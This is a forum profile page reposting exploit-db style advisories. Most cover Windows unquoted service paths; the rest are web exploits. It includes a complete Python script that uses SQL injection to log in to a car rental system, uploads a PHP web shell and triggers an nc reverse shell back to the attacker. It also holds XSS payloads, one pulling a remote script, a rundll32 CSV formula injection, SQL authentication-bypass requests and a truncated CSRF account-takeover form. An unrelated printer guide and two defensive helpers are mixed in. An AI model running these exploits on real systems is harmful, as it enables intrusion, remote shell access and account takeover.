HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-07
# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/descarga-completada
# Tested Version: 2.5.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "MotoHelperService " | findstr /i /v """

Motorola Device Manager Service    Motorola Device Manager    C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe    Auto

# Service info:

C:\>sc qc "Motorola Device Manager"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Motorola Device Manager
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Motorola Device Manager Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
A successful attempt would cause the local user to be able to insert their code in the system root path undetected by the OS or other security applications and elevate his privileges after reboot.
  2. # Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
# Discovery by: Erika Figueroa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.0.55
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """

Realtek Audio Service    RtkAudioService    C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe    Auto

# Service info:

C:\>sc qc "RtkAudioService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: RtkAudioService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
        GRUPO_ORDEN_CARGA  : PlugPlay
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Realtek Audio Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  3. #Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Microvirt
#Version : Microvirt MEMU 3.7.0
#Vendor Homepage : https://www.memuplay.com/
#Tested on OS: Windows 10 Home

#Analyze PoC :
==============

C:\Users\Sam Sanz>sc qc "MEmusvc"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: MEmusvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MEmusvc
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
  4. # Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path
# Discovery by: Carlos Roa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home
# Tested Version: 5.1.0.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Professional 64 bits (spanish)

# Step to discover Unquoted Service Path:

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """

Canon Inkjet Printer/Scanner/Fax Extended Survey Program    IJPLMSVC    C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE    Auto

# Service info:

C:\Users>sc qc IJPLMSVC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ijplmsvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Canon Inkjet Printer/Scanner/Fax Extended Survey Program
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  5. # Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
# Discovery by: Leslie Lara
# Discovery Date: 7-09-2020
# Vendor Homepage: https://www.huawei.com/en/corporate-information
# Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm
# Tested Version: 3.0.2.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

iDeskService    iDeskService    C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe    Auto

C:\>sc qc "iDeskService"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: iDeskService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : iDeskService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
  6. #Exploit Title: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Magic Utilities Pty
#Version : 64-bit 2.20
#Vendor Homepage : https://magicutilities.net/magic-mouse/home
#Tested on OS: Windows 10 Home

#Analyze PoC :
==============

C:\>sc qc "magicmouse2service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: magicmouse2service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Magic Mouse 2 - Utilities\MagicMouse2Service.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Magic Mouse 2 Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
  7. # Exploit Title: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path
# Discovery by: Paulina Girón
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.deepinstinct.com/
# Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/
# Tested Version: 1.2.24.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro 64 bits

1) C:\> wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DeepNetworkService" |findstr /i /v """

Deep Instinct Network Service    DeepNetworkService    C:\Program Files\HP Sure Sense\DeepNetworkService.exe    Auto

2) C:\> sc qc "DeepNetworkService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DeepNetworkService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\HP Sure Sense\DeepNetworkService.exe
        GRUPO_ORDEN_CARGA  : FSFilter Anti-Virus
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Deep Instinct Network Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
  8. # Exploit Title: Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.cybertronsoft.com/
# Software Link: https://www.cybertronsoft.com/download/privacy-drive-setup.exe
# Version: Version 3.17.0 Build 1456
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc PDSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PDSvc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Cybertron\Privacy Drive\pdsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PrivacyDrive Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  9. # Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.diskboss.com/
# Software Link: https://www.diskboss.com/downloads.html
# Version: v11.7.28
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763

# Product             | Version
# DiskBoss            | v11.7.28
# DiskBoss Pro        | v11.7.28
# DiskBoss Ultimate   | v11.7.28
# DiskBoss Server     | v11.7.28
# DiskBoss Enterprise | v11.7.28

# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.

# Services info:

C:\Users\m507>sc qc "DiskBoss Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DiskBoss Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\DiskBoss\bin\diskbsa.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DiskBoss Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

C:\Users\m507>sc qc "DiskBoss Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DiskBoss Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DiskBoss Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

C:\Users\m507>sc qc "DiskBoss Ultimate Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DiskBoss Ultimate Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DiskBoss Ultimate Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

C:\Users\m507>sc qc "DiskBoss Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DiskBoss Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DiskBoss Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

C:\Users\m507>sc qc "DiskBoss Pro Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DiskBoss Pro Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DiskBoss Pro Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  10. # Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.real.com/
# Tested Version: 18.1.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Enterprise SP1 x64 es

# Step to discover Unquoted Service Path:

c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """

RealTimes Desktop Service    RealTimes Desktop Service    c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe    Auto

# Service info

sc qc "RealTimes Desktop Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: RealTimes Desktop Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : RealTimes Desktop Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
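A defender-side check for the condition posts 1 to 10 above report, added here as an example; it is not code from any of those advisories. It parses `sc qc` output with either the English labels (`BINARY_PATH_NAME`) or the Spanish ones (`NOMBRE_RUTA_BINARIO`) seen in the posts, flags a binary path that is unquoted and contains spaces (the same condition the advisories' `findstr /i /v """` filter selects), and prints the quoted path plus the `sc config ... binPath=` command that remediates it. The transcript, service name and paths in the sample are constructed.

```python
"""Added audit helper for unquoted Windows service paths (example code, not
from the advisories above). Sample `sc qc` transcript below is constructed."""
import re

# Field labels sc.exe prints on English and Spanish builds of Windows
SERVICE_NAME_LABELS = ("SERVICE_NAME", "NOMBRE_SERVICIO")
BINARY_PATH_LABELS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")
START_TYPE_LABELS = ("START_TYPE", "TIPO_INICIO")

# Constructed sample, shaped like the Spanish transcripts in the advisories
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Example Device Manager
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\\Program Files (x86)\\Example Vendor\\Example Device Manager\\ExampleService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Example Device Manager Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""


def parse_sc_qc(output):
    """Return {'name', 'path', 'start_type'} from one `sc qc` transcript.
    Each field line is 'LABEL : value'; the first colon ends the label, so a
    drive letter inside the path value is not mistaken for a separator."""
    fields = {}
    for line in output.splitlines():
        label, sep, value = line.partition(":")
        if sep:
            fields[label.strip()] = value.strip()

    def pick(labels):
        return next((fields[l] for l in labels if l in fields), "")

    return {"name": pick(SERVICE_NAME_LABELS),
            "path": pick(BINARY_PATH_LABELS),
            "start_type": pick(START_TYPE_LABELS)}


def split_image_path(image_path):
    """Split an ImagePath into (executable, arguments, was_quoted).
    A quoted path ends at the closing quote; an unquoted one ends at the first
    '.exe' (case-insensitive) and whatever follows is treated as arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end], path[end + 1:].strip(), True
    m = re.match(r"(.+?\.exe)(?:\s+(.*))?$", path, re.IGNORECASE)
    if not m:
        return path, "", False
    return m.group(1), m.group(2) or "", False


def is_unquoted_service_path(image_path):
    """True when the executable part is unquoted and contains a space."""
    exe, _, quoted = split_image_path(image_path)
    return (not quoted) and (" " in exe)


def quoted_image_path(image_path):
    """The remediated ImagePath: executable in double quotes, arguments kept."""
    exe, args, _ = split_image_path(image_path)
    return '"%s"' % exe + (" " + args if args else "")


def sc_config_command(service_name, image_path):
    """`sc config` invocation that rewrites the path. Note the mandatory space
    after 'binPath=' and the escaped quotes inside the outer quotes."""
    exe, args, _ = split_image_path(image_path)
    inner = '\\"%s\\"' % exe + (" " + args if args else "")
    return 'sc config "%s" binPath= "%s"' % (service_name, inner)


def audit(transcripts):
    """Return (name, current path, fixed path) for every vulnerable service."""
    findings = []
    for transcript in transcripts:
        svc = parse_sc_qc(transcript)
        if is_unquoted_service_path(svc["path"]):
            findings.append((svc["name"], svc["path"], quoted_image_path(svc["path"])))
    return findings


if __name__ == "__main__":
    for name, bad, good in audit([SAMPLE_SC_QC]):
        print("%s: unquoted service path with spaces" % name)
        print("  before: %s" % bad)
        print("  after:  %s" % good)
        print("  fix:    %s" % sc_config_command(name, bad))
```

On a real host, feed `audit()` the text of `sc qc <service>` for each service returned by the `wmic` query in the posts; a finding is only exploitable when a standard user can write to one of the intermediate directories, so pair the check with an ACL review of those directories before prioritising remediation.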
  11. # Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
# Date: 09-11-2020
# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Debian 10 with apache2

# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
# on the victim system
#
# on the Attacker machine you must listen with NC on a port

```python
import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path

#foxlox#

payload = {"username":"' OR 1=1 limit 1#","password":"moana"}
proxies = { "http": "http://localhost:8080"}
#payload = "username=' OR 1=1 limit 1 #&password=ciao"

def deb(str):
    print("Debug => "+str)

def login():
    deb("Login...")
    session=requests.Session()
    url = mainurl+"/admin/ajax.php?action=login"
    #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
    r=session.post(url,payload, allow_redirects=False,proxies=proxies)
    cookie = r.headers["Set-Cookie"]
    deb(cookie)
    return cookie

def find_all(a_str, sub,lbegin,lend):
    start = 0
    start = a_str.find(sub, start)
    t=(a_str[start+lbegin:start+lend]).replace('"','')
    return t

def upload(c):
    deb("Getting cookie")
    c = c.split("=");cookie={c[0]:c[1]}
    deb("Sending payload")
    filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')}
    fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
    r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
    deb("Saved Machine");
    r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
    mid=find_all(r.content,'data-id=',8,11)
    deb("Machine id: "+mid)
    r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
    defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
    deb("Exploit url: "+defurl)
    #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
    exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
    print("Opening url: "+exploit)
    print("Don't forget to run: nc -nvlp "+sys.argv[3])
    os.system(exploit)

def usage():
    if len(sys.argv) < 4:
        print("Create a PHPShell for Car Rental Management System")
        print("example:")
        print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
        exit()

usage()
mainurl = sys.argv[1]
upload(login())
#fox
```
  12. # Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
# Date: 2020-09-21
# Exploit Author: Philip Holbrook (@fhlipZero)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
# Version: 1.2.6
# Tested on: Windows / Mac
# CVE : CVE-2020-28249
# References:
# https://github.com/fhlip0/JopinXSS/blob/main/readme.md

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter

# 2. PoC
# Paste the following payload into a note:

```
<link rel=import href="data:text/html&comma;<script>alert(XSS)<&sol;script>
<script src="//brutelogic.com.br&sol;1.js&num; </script>
```
  13. Foreword

With the development of technology, more and more printer devices support network printing. Connect the printer to the Internet, and within the same LAN all devices such as laptops and mobile phones can easily carry out printing tasks. Some old-fashioned printing devices cannot be connected to the Internet and can only print through printer sharing. So is there any other way?

Experimental Environment

Lenovo M7400 PRO printer with USB interface (flashed with old firmware)

Solve Driver Problems

Because our router cannot install the printer driver, the driver can only be installed on our computer. We can download the corresponding printer driver from Driver Sky.

Add printer

Open the control panel - Add printer - Add manually - Select to use IP address - Device type is tcp/ip device - Host address is the IP of the router - Select driver and complete installation.

Test

(video tutorial)

Realize mobile phone printing

Install the PrintHand tool on the mobile phone. Then add the WiFi printer near the printer - Add manually - Protocol RAW, port 9100. Just select Brother - Brother DCP 7080.
  14. # Exploit Title: Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

Stored XSS Reproduction Steps:
1. Navigate to http://TARGET/customer_support/index.php?page=department_list
2. Click on new Department
3. Add the XSS payload into the "description" parameter value
4. Browse to the post to trigger the XSS payload

# POC

POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606
Content-Length: 445
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/index.php?page=department_list
Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq

-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="id"

4
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="name"

Stored xss
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="description"

<script>alert("STORED XSS")</script>
-----------------------------196034062430192961002574272606--
  15. # Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection
# Date: 2020-10-17
# Exploit Author: Mufaddal Masalawala
# Vendor Homepage: https://www.anuko.com/ <https://berrnd.de/>
# Software Link: https://www.anuko.com/time-tracker/index.htm
# Version: 1.19.23.5325
# Tested on: Kali Linux 2020.3
# CVE: CVE-2020-15255

# Proof Of Concept:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and Note data field that is mistreated while exporting to a CSV file.

To exploit this vulnerability:
1. Login to the application, goto 'User' module and edit the user
2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the 'Name' field
3. Goto 'Project' module, add a new project with the same malicious payload in the 'Name' field
4. Goto 'Time' module, select our created User, Project and again enter the same payload in 'Note' field
5. Enter the rest of the details and click 'Submit'
6. Now goto 'Reports', click Generate and download the CSV file
7. Open the CSV file, allow all popups and our payload is executed (calculator is opened).
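The export-side defence for the formula injection described above, added here as an example; it is not Anuko's code. Any cell built from a user-controlled field (User, Project, Note in the post) that begins with a formula trigger character gets an apostrophe prefix so a spreadsheet treats it as text, and every field is quoted so embedded separators cannot start a new field or record. The report rows are constructed.

```python
"""Added example (not Anuko Time Tracker code): neutralise spreadsheet formula
triggers in user-controlled cells before writing a CSV report."""
import csv
import io

# Leading characters that make Excel and LibreOffice evaluate a cell as a formula
FORMULA_TRIGGERS = ("=", "+", "-", "@")
# Whitespace some importers skip before looking at the first character
LEADING_WHITESPACE = " \t\r\n"


def neutralize_cell(value):
    """Return the cell as text a spreadsheet will not evaluate. Leading
    whitespace is dropped so it cannot hide a trigger, and an apostrophe is
    prepended when the first remaining character is a trigger."""
    text = "" if value is None else str(value)
    stripped = text.lstrip(LEADING_WHITESPACE)
    if stripped and stripped[0] in FORMULA_TRIGGERS:
        return "'" + stripped
    return text


def export_rows(header, rows):
    """Write header and rows as CSV text. The header is application-controlled
    and left alone; every data cell is neutralised, and QUOTE_ALL doubles any
    embedded quote and wraps each field, so commas, quotes and newlines in a
    cell stay inside that cell."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed report rows: the first cell of rows 1 and 2 would be evaluated
# as a formula if written unchanged.
SAMPLE_ROWS = [
    ["=2+2", "Alpha, beta", 'say "hi"'],
    ["\t@SUM(A1:A2)", "Gamma", "plain note"],
    ["alice", "Delta", "-"],  # a lone '-' is neutralised too: the trade-off for text columns
]

if __name__ == "__main__":
    print(export_rows(["User", "Project", "Note"], SAMPLE_ROWS))
```

Numeric columns should be emitted as numbers by the report generator rather than passed through `neutralize_cell`, otherwise a legitimate negative value such as `-5` is exported as the text `'-5`.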
  16. # Exploit Title: ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting
# Date: 11/8/2020
# Exploit Author: Joe Helle
# Vendor Homepage: https://www.mitel.com/articles/what-happened-shoretel-products
# Version: 19.46.1802.0
# Tested on: Linux
# CVE: 2020-28351

PoC:

The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient validation for the time_zone object in the HOME_MEETING& page.

Vulnerable payload

/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME

Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown object is located. Upon executing the payload, the exploit executes when the mouse is rolled over the dropdown menu object.

https://github.com/dievus/CVE-2020-28351
  17. # Title: Customer Support System 1.0 - 'username' Authentication Bypass
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description : Authentication Bypass

# Vulnerability Details:
[+] A SQL injection vulnerability in Customer Support System 1.0 allows remote unauthenticated attackers to bypass the authentication process via username and password parameters.

# Malicious POST Request to https://TARGET

POST /customer_support/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/login.php
Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo

username=' or 1=1 or ''='&password=password&type=1
  18. # Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover)
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description : Admin Account Takeover

# Vulnerability Details
[+] The username and password parameters can be forged to force the password change of admin user account.

# POC - CSRF HTML

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/customer_support/ajax.php?action=save_user" method="POST">
      <input type="hidden" name="id" value="1" />
